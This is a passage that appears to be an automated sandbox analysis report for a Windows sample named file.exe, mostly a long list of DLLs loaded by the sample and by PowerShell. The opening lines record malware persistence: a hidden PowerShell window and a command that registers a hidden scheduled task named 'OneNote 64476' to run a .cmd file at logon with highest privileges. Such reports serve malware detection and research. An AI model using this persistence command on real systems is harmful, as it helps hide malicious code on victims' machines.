    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network64476Man')
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 64476' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network64476Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dxgidebug.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: windowscodecs.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: pcacli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
